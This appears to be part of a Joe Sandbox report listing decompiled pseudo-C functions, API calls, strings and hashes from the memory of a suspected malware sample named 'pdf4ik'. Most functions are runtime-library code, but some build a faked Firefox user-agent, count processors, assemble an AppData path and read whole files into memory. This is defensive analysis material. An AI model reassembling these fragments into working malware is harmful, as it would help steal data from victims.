                                        							} else {
                                        								 *((char*)( *_t50)) = _t33;
                                        								return _t50;
                                        							}
                                        						}
                                        					} else {
                                        						E29D89750(_t50, _t33, _t16);
                                        						if(_t33 == 0) {
                                        							L22:
                                        							goto L23;
                                        						} else {
                                        							L9:
                                        							_t18 =  *((intOrPtr*)(_t50 + 0x14));
                                        							if(_t18 < 0x10) {
                                        								_t40 = _t50;
                                        							} else {
                                        								_t40 =  *_t50;
                                        							}
                                        							if(_t18 < 0x10) {
                                        								_t19 = _t50;
                                        							} else {
                                        								_t19 =  *_t50;
                                        							}
                                        							E29DAE1F0(_t19 + _t51 + _a4, _t40 + _t51,  *((intOrPtr*)(_t50 + 0x10)) - _t51);
                                        							E29D953E0(_t50, _a4, _a8, _t51);
                                        							 *((intOrPtr*)(_t50 + 0x10)) = _t33;
                                        							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
                                        								 *((char*)(_t50 + _t33)) = 0;
                                        								goto L22;
                                        							} else {
                                        								 *((char*)( *_t50 + _t33)) = 0;
                                        								return _t50;
                                        							}
                                        						}
                                        					}
                                        				}
                                        			}
















                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29DA6F22
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4A2
                                          • Part of subcall function 29DAD48D: __CxxThrowException@8.LIBCMT ref: 29DAD4B7
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4C8
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29DA6F38
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29DA6F53
                                        • _memmove.LIBCMT ref: 29DA6FB7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                        • String ID: invalid string position$string too long
                                        • API String ID: 443534600-4289949731
                                        • Opcode ID: f61d4498f6b1bc7a5c8c282a9c17cd594cf9a256cefd0c55b7b09adb5585957b
                                        • Instruction ID: 091107b159d9ac5058601c17bb855e28187520d7c04db006b90931c8d204b008
                                        • Opcode Fuzzy Hash: f61d4498f6b1bc7a5c8c282a9c17cd594cf9a256cefd0c55b7b09adb5585957b
                                        • Instruction Fuzzy Hash: D9210536310101ABC3049F6DDCC0E69BB96BFA1161B94461EF555CBF81CB70E876E3A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 46%
                                        			E29DA3C40(intOrPtr __ecx) {
                                        				char _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				intOrPtr _v28;
                                        				char _v48;
                                        				char _v52;
                                        				char _v56;
                                        				intOrPtr _v60;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t25;
                                        				signed int _t26;
                                        				char* _t33;
                                        				void* _t34;
                                        				void* _t37;
                                        				void* _t46;
                                        				void* _t60;
                                        				intOrPtr _t62;
                                        				void* _t63;
                                        				signed int _t64;
                                        				void* _t65;
                                        				void* _t66;
                                        				void* _t67;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC2489);
                                        				_push( *[fs:0x0]);
                                        				_t66 = _t65 - 0x2c;
                                        				_t25 =  *0x29dd5664; // 0xd9555f04
                                        				_t26 = _t25 ^ _t64;
                                        				_v20 = _t26;
                                        				_push(_t26);
                                        				 *[fs:0x0] =  &_v16;
                                        				_v8 = 0;
                                        				_t62 = __ecx;
                                        				_v56 = 0;
                                        				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
                                        				 *((intOrPtr*)(__ecx + 0x10)) = 0;
                                        				_v60 = __ecx;
                                        				 *((char*)(__ecx)) = 0;
                                        				E29D892C0(__ecx, 0x29dcd617, 0);
                                        				_v8 = 0;
                                        				_v56 = 1;
                                        				E29D892C0(__ecx, "Mozilla/5.0 (Windows NT 10.0; ", 0x1e);
                                        				_push( &_v52);
                                        				_v52 = 0;
                                        				_push(GetCurrentProcess());
                                        				if( *0x29dd8540() == 0) {
                                        					L2:
                                        					_t33 = "x86";
                                        				} else {
                                        					_t33 = "x64";
                                        					if(_v52 == 0) {
                                        						goto L2;
                                        					}
                                        				}
                                        				_t34 = E29D95460( &_v48, _t62, _t33);
                                        				_t67 = _t66 + 0xc;
                                        				_v8 = 1;
                                        				E29D891D0(_t34, _t62);
                                        				_v8 = 0;
                                        				if(_v28 >= 0x10) {
                                        					_t55 = _v48;
                                        					_push(_v48);
                                        					E29DADF3B();
                                        					_t67 = _t67 + 4;
                                        				}
                                        				_t37 = E29D95460( &_v48, _t62, " rv:107.0) Gecko / 20100101 Firefox / 107.0");
                                        				_v8 = 2;
                                        				E29D891D0(_t37, _t62);
                                        				if(_v28 >= 0x10) {
                                        					_push(_v48);
                                        					E29DADF3B();
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				_pop(_t60);
                                        				_pop(_t63);
                                        				_pop(_t46);
                                        				return E29DADF46(_t62, _t46, _v20 ^ _t64, _t55, _t60, _t63);
                                        			}




























                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000002,Mozilla/5.0 (Windows NT 10.0; ,0000001E,29DCD617,00000000,D9555F04,00000010,?,00000002,?,?,?,?,?,?,00000000), ref: 29DA3CAF
                                        • IsWow64Process.KERNEL32(00000000,?,?,?,?,?,?,00000000,29DC2489,000000FF,?,29D91E6F), ref: 29DA3CB6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CurrentWow64
                                        • String ID: rv:107.0) Gecko / 20100101 Firefox / 107.0$Mozilla/5.0 (Windows NT 10.0; $x64$x86
                                        • API String ID: 1905925150-3528451930
                                        • Opcode ID: 6ac3dd8a27e037068810ef043c3c189e81771526d2c4756c9b839d456938144a
                                        • Instruction ID: 039fe2ebcd6de606b2bb2736261b648d1b8a206e74d777e5250659795aea7694
                                        • Opcode Fuzzy Hash: 6ac3dd8a27e037068810ef043c3c189e81771526d2c4756c9b839d456938144a
                                        • Instruction Fuzzy Hash: 5C3184B2D11248BBCB10EFA4D884A9EB7B9FF54710F50853EE505A3640D7349A06E7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 64%
                                        			E29DA2F50() {
                                        				char _v8;
                                        				intOrPtr* _v12;
                                        				void* __edi;
                                        				void* __esi;
                                        				char* _t11;
                                        				intOrPtr _t14;
                                        				intOrPtr* _t18;
                                        				void* _t20;
                                        				intOrPtr* _t21;
                                        				char _t24;
                                        				intOrPtr _t25;
                                        				intOrPtr* _t26;
                                        				void* _t27;
                                        
                                        				_t11 =  &_v8;
                                        				_t26 = 0;
                                        				_v8 = 0;
                                        				_t20 = 0;
                                        				_v12 = 0;
                                        				_t25 = 0;
                                        				__imp__GetLogicalProcessorInformationEx(0xffff, 0, _t11);
                                        				if(_t11 != 0) {
                                        					L7:
                                        					_t24 = _v8;
                                        					_t21 = _t26;
                                        					if(_t24 != 0) {
                                        						do {
                                        							_t21 = _t21 + _t25;
                                        							if( *_t21 == 0) {
                                        								_v12 = _v12 + 1;
                                        							}
                                        							_t14 =  *((intOrPtr*)(_t21 + 4));
                                        							_t20 = _t20 + _t14;
                                        							_t25 = _t14;
                                        						} while (_t20 < _t24);
                                        					}
                                        					E29DADFA6(_t26);
                                        					return _v12;
                                        				} else {
                                        					while(GetLastError() == 0x7a) {
                                        						if(_t26 != 0) {
                                        							E29DADFA6(_t26);
                                        							_t27 = _t27 + 4;
                                        						}
                                        						_t18 = E29DADFE0(_t23, _t25, _t26, _v8);
                                        						_t26 = _t18;
                                        						_t27 = _t27 + 4;
                                        						if(_t26 == 0) {
                                        							L14:
                                        							return 0;
                                        						} else {
                                        							_t23 =  &_v8;
                                        							__imp__GetLogicalProcessorInformationEx(0xffff, _t26,  &_v8);
                                        							if(_t18 == 0) {
                                        								continue;
                                        							} else {
                                        								goto L7;
                                        							}
                                        						}
                                        						goto L15;
                                        					}
                                        					if(_t26 != 0) {
                                        						E29DADFA6(_t26);
                                        					}
                                        					goto L14;
                                        				}
                                        				L15:
                                        			}

















                                        APIs
                                        • GetLogicalProcessorInformationEx.KERNEL32(0000FFFF,00000000,29D93478,00000010,?,00000000,?,29D93478), ref: 29DA2F6F
                                        • GetLastError.KERNEL32(?,29D93478), ref: 29DA2F80
                                        • _free.LIBCMT ref: 29DA2F90
                                          • Part of subcall function 29DADFA6: HeapFree.KERNEL32(00000000,00000000,?,29DB523C,00000000,?,?,29DB2035,29DAE069,?,?,29D84BED,00000000), ref: 29DADFBC
                                          • Part of subcall function 29DADFA6: GetLastError.KERNEL32(00000000,?,29DB523C,00000000,?,?,29DB2035,29DAE069,?,?,29D84BED,00000000), ref: 29DADFCE
                                        • _malloc.LIBCMT ref: 29DA2F9C
                                        • GetLogicalProcessorInformationEx.KERNEL32(0000FFFF,00000000,29D93478,?,?,29D93478), ref: 29DA2FB4
                                        • _free.LIBCMT ref: 29DA2FDD
                                        • _free.LIBCMT ref: 29DA2FF4
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorInformationLastLogicalProcessor$FreeHeap_malloc
                                        • String ID:
                                        • API String ID: 1407183230-0
                                        • Opcode ID: 551ff06cc015d8f1905a3f12ef0e499e0980ab24fcaa8db4cc320425a8e9b36a
                                        • Instruction ID: b4401719a9dcfcbc8a689fe9298607b7af11424f40da220b93b7c5d04f836835
                                        • Opcode Fuzzy Hash: 551ff06cc015d8f1905a3f12ef0e499e0980ab24fcaa8db4cc320425a8e9b36a
                                        • Instruction Fuzzy Hash: D9113F32E011246BD7149BA7DC40BAF7764EF81620F20417CEE08D7600EB319A27B2E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E29D8F9C0(void* __ebx, void* __edi, void* __esi) {
                                        				signed int _v8;
                                        				char _v1012;
                                        				void* _v2012;
                                        				char _v3012;
                                        				signed int _t16;
                                        				CHAR* _t41;
                                        				signed int _t47;
                                        
                                        				_t16 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t16 ^ _t47;
                                        				E29DB5640( &_v1012, 0, 0x3e8);
                                        				E29DB5640( &_v3012, 0, 0x3e8);
                                        				_t41 =  *0x29dd7dbc; // 0x15a2250
                                        				lstrcatA( &_v3012, _t41);
                                        				E29DB5640( &_v2012, 0, 0x3e8);
                                        				_t10 = (0 |  *0x29dd8500(0x1a, 0, 0,  &_v2012) < 0x00000000) - 1; // -1
                                        				lstrcatA( &_v1012, _t10 &  &_v2012);
                                        				lstrcatA( &_v1012,  &_v3012);
                                        				return E29DADF46(E29D8F640( &_v1012, __edi), __ebx, _v8 ^ _t47,  &_v1012, __edi, __esi, 0);
                                        			}











                                        APIs
                                        • _memset.LIBCMT ref: 29D8F9E1
                                        • _memset.LIBCMT ref: 29D8F9F7
                                        • lstrcatA.KERNEL32(?,015A2250), ref: 29D8FA0D
                                        • _memset.LIBCMT ref: 29D8FA21
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 29D8FA38
                                        • lstrcatA.KERNEL32(?,-00000001), ref: 29D8FA58
                                        • lstrcatA.KERNEL32(?,?), ref: 29D8FA6C
                                          • Part of subcall function 29D8F640: _memset.LIBCMT ref: 29D8F669
                                          • Part of subcall function 29D8F640: _memset.LIBCMT ref: 29D8F67F
                                          • Part of subcall function 29D8F640: _memset.LIBCMT ref: 29D8F695
                                          • Part of subcall function 29D8F640: _memset.LIBCMT ref: 29D8F6AB
                                          • Part of subcall function 29D8F640: _memset.LIBCMT ref: 29D8F6C1
                                          • Part of subcall function 29D8F640: _memset.LIBCMT ref: 29D8F6D7
                                          • Part of subcall function 29D8F640: _memset.LIBCMT ref: 29D8F6ED
                                          • Part of subcall function 29D8F640: _memset.LIBCMT ref: 29D8F703
                                          • Part of subcall function 29D8F640: _memset.LIBCMT ref: 29D8F719
                                          • Part of subcall function 29D8F640: lstrcatA.KERNEL32(?,015A19F0), ref: 29D8F72E
                                          • Part of subcall function 29D8F640: lstrcatA.KERNEL32(?,015A2160), ref: 29D8F742
                                          • Part of subcall function 29D8F640: lstrcatA.KERNEL32(?,015A19A0), ref: 29D8F756
                                          • Part of subcall function 29D8F640: lstrcatA.KERNEL32(?,015A1B20), ref: 29D8F769
                                          • Part of subcall function 29D8F640: lstrcatA.KERNEL32(?,015A21D8), ref: 29D8F77D
                                          • Part of subcall function 29D8F640: lstrcatA.KERNEL32(?), ref: 29D8F78B
                                          • Part of subcall function 29D8F640: lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D8F79D
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memset$lstrcat$FolderPath
                                        • String ID:
                                        • API String ID: 154973558-0
                                        • Opcode ID: a8c907551793eff85331c46ae56f6ce3b9bb624b40be6916526936ee4f73f091
                                        • Instruction ID: 4221cb6dc11b7205c1d9672f906cb275fa853572f50117a467a2e5422a939844
                                        • Opcode Fuzzy Hash: a8c907551793eff85331c46ae56f6ce3b9bb624b40be6916526936ee4f73f091
                                        • Instruction Fuzzy Hash: E0119372D40259ABD715EF60DC55FEE7378FB14B00F44859DB109AA0C1EA74A7099FA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 64%
                                        			E29DB07FA(void* __ebx, void* __eflags, intOrPtr _a4) {
                                        				void* _t9;
                                        				char* _t11;
                                        				char* _t12;
                                        				void* _t16;
                                        				signed int _t17;
                                        				void* _t29;
                                        				char* _t30;
                                        				void* _t31;
                                        
                                        				_push(__ebx);
                                        				_t29 = E29DB51D2(__ebx);
                                        				if(_t29 != 0) {
                                        					if( *(_t29 + 0x24) != 0) {
                                        						L7:
                                        						_t30 =  *(_t29 + 0x24);
                                        						if(E29DAE6AF(_t30, 0x86, E29DB07D2(_a4)) != 0) {
                                        							_push(0);
                                        							_push(0);
                                        							_push(0);
                                        							_push(0);
                                        							_push(0);
                                        							_t9 = E29DB39A5();
                                        							asm("int3");
                                        							_push(_t30);
                                        							_t31 = _t16;
                                        							if(_t31 != 0 && _t9 != 0 && _t9 != _t31) {
                                        								_push(0x86);
                                        								_t17 = 0x36;
                                        								 *(memcpy(_t9, _t31, _t17 << 2)) =  *_t10 & 0x00000000;
                                        								_t9 = E29DB4D62(_t10);
                                        							}
                                        							return _t9;
                                        						} else {
                                        							_t11 = _t30;
                                        							goto L5;
                                        						}
                                        					} else {
                                        						_t12 = E29DB1F54(0x86, 1);
                                        						_pop(_t16);
                                        						 *(_t29 + 0x24) = _t12;
                                        						if(_t12 != 0) {
                                        							goto L7;
                                        						} else {
                                        							_t11 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
                                        							L5:
                                        							goto L6;
                                        						}
                                        					}
                                        				} else {
                                        					_t11 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
                                        					L6:
                                        					return _t11;
                                        				}
                                        			}












                                        APIs
                                        • __getptd_noexit.LIBCMT ref: 29DB0801
                                          • Part of subcall function 29DB51D2: GetLastError.KERNEL32(?,?,29DB2035,29DAE069,?,?,29D84BED,00000000), ref: 29DB51D6
                                          • Part of subcall function 29DB51D2: ___set_flsgetvalue.LIBCMT ref: 29DB51E4
                                          • Part of subcall function 29DB51D2: __calloc_crt.LIBCMT ref: 29DB51F8
                                          • Part of subcall function 29DB51D2: DecodePointer.KERNEL32(00000000,?,?,29DB2035,29DAE069,?,?,29D84BED,00000000), ref: 29DB5212
                                          • Part of subcall function 29DB51D2: GetCurrentThreadId.KERNEL32 ref: 29DB5228
                                          • Part of subcall function 29DB51D2: SetLastError.KERNEL32(00000000,?,?,29DB2035,29DAE069,?,?,29D84BED,00000000), ref: 29DB5240
                                        • __calloc_crt.LIBCMT ref: 29DB0823
                                        • __get_sys_err_msg.LIBCMT ref: 29DB0841
                                        • _strcpy_s.LIBCMT ref: 29DB0849
                                        • __invoke_watson.LIBCMT ref: 29DB085E
                                        Strings
                                        • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 29DB080E, 29DB0831
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
                                        • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                        • API String ID: 3117964792-798102604
                                        • Opcode ID: e6dbc857200de43b3e56d1c00060aca87d3f9ea22c11393ec7eef0da240ca9fc
                                        • Instruction ID: 3968675c8db8677343a4684b331562f707312c4cdaf7dd2bdb12622ff693fab2
                                        • Opcode Fuzzy Hash: e6dbc857200de43b3e56d1c00060aca87d3f9ea22c11393ec7eef0da240ca9fc
                                        • Instruction Fuzzy Hash: EBF02176906214BBD3143916DCE1C47715CAB94660B40453EF64BAFE01D921DE03F1E5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 91%
                                        			E29DB511E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                        				intOrPtr _t26;
                                        				intOrPtr _t30;
                                        				intOrPtr _t39;
                                        				void* _t40;
                                        
                                        				_t31 = __ebx;
                                        				_push(8);
                                        				_push(0x29dd1d70);
                                        				E29DB5A50(__ebx, __edi, __esi);
                                        				GetModuleHandleW(L"KERNEL32.DLL");
                                        				_t39 =  *((intOrPtr*)(_t40 + 8));
                                        				 *((intOrPtr*)(_t39 + 0x5c)) = 0x29dc7188;
                                        				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
                                        				 *((intOrPtr*)(_t39 + 0x14)) = 1;
                                        				 *((intOrPtr*)(_t39 + 0x70)) = 1;
                                        				 *((char*)(_t39 + 0xc8)) = 0x43;
                                        				 *((char*)(_t39 + 0x14b)) = 0x43;
                                        				 *(_t39 + 0x68) = 0x29dd5678;
                                        				E29DB60C0(__ebx, 1, 0xd);
                                        				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                                        				InterlockedIncrement( *(_t39 + 0x68));
                                        				 *(_t40 - 4) = 0xfffffffe;
                                        				E29DB51C0();
                                        				E29DB60C0(_t31, 1, 0xc);
                                        				 *(_t40 - 4) = 1;
                                        				_t26 =  *((intOrPtr*)(_t40 + 0xc));
                                        				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
                                        				if(_t26 == 0) {
                                        					_t30 =  *0x29dd5de0; // 0x2bab2e28
                                        					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
                                        				}
                                        				E29DB4D62( *((intOrPtr*)(_t39 + 0x6c)));
                                        				 *(_t40 - 4) = 0xfffffffe;
                                        				return E29DB5A95(E29DB51C9());
                                        			}








                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,29DD1D70,00000008,29DB5226,00000000,00000000,?,?,29DB2035,29DAE069,?,?,29D84BED,00000000), ref: 29DB512F
                                        • __lock.LIBCMT ref: 29DB5163
                                          • Part of subcall function 29DB60C0: __mtinitlocknum.LIBCMT ref: 29DB60D6
                                          • Part of subcall function 29DB60C0: __amsg_exit.LIBCMT ref: 29DB60E2
                                          • Part of subcall function 29DB60C0: EnterCriticalSection.KERNEL32(?,?,?,29DB5168,0000000D), ref: 29DB60EA
                                        • InterlockedIncrement.KERNEL32(29DD5678), ref: 29DB5170
                                        • __lock.LIBCMT ref: 29DB5184
                                        • ___addlocaleref.LIBCMT ref: 29DB51A2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                        • String ID: KERNEL32.DLL
                                        • API String ID: 637971194-2576044830
                                        • Opcode ID: 0d693c6ff1a3ae96d8f1ec877cc805dfc952aa10f028159beedac7825b0e8277
                                        • Instruction ID: 132e5ffd8f1100d0c9ffc186b7835a3f37144d3ff85bfde68948539e78a17482
                                        • Opcode Fuzzy Hash: 0d693c6ff1a3ae96d8f1ec877cc805dfc952aa10f028159beedac7825b0e8277
                                        • Instruction Fuzzy Hash: 95016972400B00EAD7209F65D954749BBE0AF20321F50DA0EE497ABA90CBB4A646EB25
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 69%
                                        			E29DB210A(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                                        				signed int _v8;
                                        				intOrPtr _t13;
                                        				void* _t16;
                                        				intOrPtr* _t20;
                                        
                                        				_t27 = __esi;
                                        				_t26 = __edi;
                                        				_t25 = __edx;
                                        				_t24 = __ebx;
                                        				_t13 =  *((intOrPtr*)( *_a4));
                                        				if(_t13 == 0xe0434352 || _t13 == 0xe0434f4d) {
                                        					__eflags =  *((intOrPtr*)(E29DB524B(_t24, _t25, __eflags) + 0x90));
                                        					if(__eflags > 0) {
                                        						_t16 = E29DB524B(_t24, _t25, __eflags);
                                        						_t5 = _t16 + 0x90;
                                        						 *_t5 =  *((intOrPtr*)(_t16 + 0x90)) - 1;
                                        						__eflags =  *_t5;
                                        					}
                                        					goto L6;
                                        				} else {
                                        					_t34 = _t13 - 0xe06d7363;
                                        					if(_t13 != 0xe06d7363) {
                                        						L6:
                                        						__eflags = 0;
                                        						return 0;
                                        					} else {
                                        						 *(E29DB524B(__ebx, __edx, _t34) + 0x90) =  *(_t17 + 0x90) & 0x00000000;
                                        						_push(8);
                                        						_push(0x29dd1ea0);
                                        						E29DB5A50(__ebx, __edi, __esi);
                                        						_t20 =  *((intOrPtr*)(E29DB524B(_t24, __edx, _t34) + 0x78));
                                        						if(_t20 != 0) {
                                        							_v8 = _v8 & 0x00000000;
                                        							 *_t20();
                                        							_v8 = 0xfffffffe;
                                        						}
                                        						return E29DB5A95(E29DB2D67(_t24, _t25, _t26, _t27));
                                        					}
                                        				}
                                        			}








                                        APIs
                                        • __getptd.LIBCMT ref: 29DB212B
                                          • Part of subcall function 29DB524B: __getptd_noexit.LIBCMT ref: 29DB524E
                                          • Part of subcall function 29DB524B: __amsg_exit.LIBCMT ref: 29DB525B
                                        • __getptd.LIBCMT ref: 29DB213C
                                        • __getptd.LIBCMT ref: 29DB214A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                        • String ID: MOC$RCC$csm
                                        • API String ID: 803148776-2671469338
                                        • Opcode ID: b9f7d668d92a28e442bc63a73333f99a61fc98b3422507ac304592061299d2ff
                                        • Instruction ID: 417862c1e9d896bb345c1e8aa43b544832aa2910c3034946471082be691627de
                                        • Opcode Fuzzy Hash: b9f7d668d92a28e442bc63a73333f99a61fc98b3422507ac304592061299d2ff
                                        • Instruction Fuzzy Hash: 04E09A36110104AFCF008B60C065B5C32E9BF6A284F0660E9DB0ECFA22C728E642B992
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 79%
                                        			E29DBB169(void* __ecx, void* __edx, intOrPtr* _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                        				signed int _v8;
                                        				int _v12;
                                        				void* _v24;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t27;
                                        				intOrPtr _t33;
                                        				int _t37;
                                        				void* _t40;
                                        				short* _t41;
                                        				short* _t47;
                                        				void* _t48;
                                        				void* _t54;
                                        				int _t56;
                                        				void* _t57;
                                        				void* _t60;
                                        				signed int _t61;
                                        				short* _t62;
                                        
                                        				_t54 = __edx;
                                        				_push(__ecx);
                                        				_push(__ecx);
                                        				_t27 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t27 ^ _t61;
                                        				_t47 = 0;
                                        				_v12 = 0;
                                        				if(_a24 == 0) {
                                        					_a24 =  *((intOrPtr*)( *_a4 + 4));
                                        				}
                                        				_t56 = MultiByteToWideChar(_a24, 1 + (0 | _a28 != _t47) * 8, _a12, _a16, _t47, _t47);
                                        				if(_t56 != _t47) {
                                        					if(__eflags > 0) {
                                        						__eflags = _t56 - 0x7ffffff0;
                                        						if(_t56 <= 0x7ffffff0) {
                                        							_t16 = _t56 + 8; // 0x8
                                        							_t40 = _t56 + _t16;
                                        							__eflags = _t40 - 0x400;
                                        							if(_t40 > 0x400) {
                                        								_t41 = E29DADFE0(_t54, _t56, MultiByteToWideChar, _t40);
                                        								__eflags = _t41 - _t47;
                                        								if(_t41 != _t47) {
                                        									 *_t41 = 0xdddd;
                                        									goto L11;
                                        								}
                                        							} else {
                                        								E29DBBB90(_t40);
                                        								_t41 = _t62;
                                        								__eflags = _t41 - _t47;
                                        								if(_t41 != _t47) {
                                        									 *_t41 = 0xcccc;
                                        									L11:
                                        									_t41 =  &(_t41[4]);
                                        									__eflags = _t41;
                                        								}
                                        							}
                                        							_t47 = _t41;
                                        						}
                                        					}
                                        					__eflags = _t47;
                                        					if(_t47 == 0) {
                                        						goto L3;
                                        					} else {
                                        						E29DB5640(_t47, 0, _t56 + _t56);
                                        						_t37 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t47, _t56);
                                        						__eflags = _t37;
                                        						if(_t37 != 0) {
                                        							_v12 = GetStringTypeW(_a8, _t47, _t37, _a20);
                                        						}
                                        						E29DB1729(_t47);
                                        						_t33 = _v12;
                                        					}
                                        				} else {
                                        					L3:
                                        					_t33 = 0;
                                        				}
                                        				_pop(_t57);
                                        				_pop(_t60);
                                        				_pop(_t48);
                                        				return E29DADF46(_t33, _t48, _v8 ^ _t61, _t54, _t57, _t60);
                                        			}























                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,0000009C,00000000,00000000,00000003,00000001,00000000,?,?,?,29DBB27E,?,00000001,?), ref: 29DBB1B3
                                        • _malloc.LIBCMT ref: 29DBB1E8
                                        • _memset.LIBCMT ref: 29DBB208
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,0000009C,?,00000001,0000009C,?,00000008,29DB0DC5,0000009C), ref: 29DBB21D
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 29DBB22B
                                        • __freea.LIBCMT ref: 29DBB235
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$StringType__freea_malloc_memset
                                        • String ID:
                                        • API String ID: 525495869-0
                                        • Opcode ID: 29d147e93ac0e972b264408aba7ec6da5b039d74c7277eba7bb238c3f0d194b1
                                        • Instruction ID: 2edd9de064fa3f5c03ba7e8b43b9586476cb82e47db0e24e1b69d486e788ffe9
                                        • Opcode Fuzzy Hash: 29d147e93ac0e972b264408aba7ec6da5b039d74c7277eba7bb238c3f0d194b1
                                        • Instruction Fuzzy Hash: C131717160024AFFDB009F65DC90DAF7BA9EF18294F10442EF906DB550D638DD62EB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 65%
                                        			E29D99120(CHAR* __eax, long* __ebx, void** _a4) {
                                        				long _v12;
                                        				intOrPtr _v20;
                                        				long _v24;
                                        				long _t15;
                                        				void* _t16;
                                        				void* _t29;
                                        				signed int _t30;
                                        
                                        				_t30 = 0;
                                        				_t29 = CreateFileA(__eax, 0x80000000, 1, 0, 3, 0, 0);
                                        				if(_t29 == 0 || _t29 == 0xffffffff) {
                                        					L8:
                                        					return _t30;
                                        				} else {
                                        					_push( &_v24);
                                        					_push(_t29);
                                        					if( *0x29dd836c() != 0 && _v20 == 0) {
                                        						_t15 = _v24;
                                        						 *__ebx = _t15;
                                        						_t16 = LocalAlloc(0x40, _t15);
                                        						 *_a4 = _t16;
                                        						if(_t16 != 0) {
                                        							_t30 = ReadFile(_t29, _t16,  *__ebx,  &_v12, 0) & (0 |  *__ebx == _v12);
                                        							if(_t30 == 0) {
                                        								LocalFree( *_a4);
                                        							}
                                        						}
                                        					}
                                        					CloseHandle(_t29);
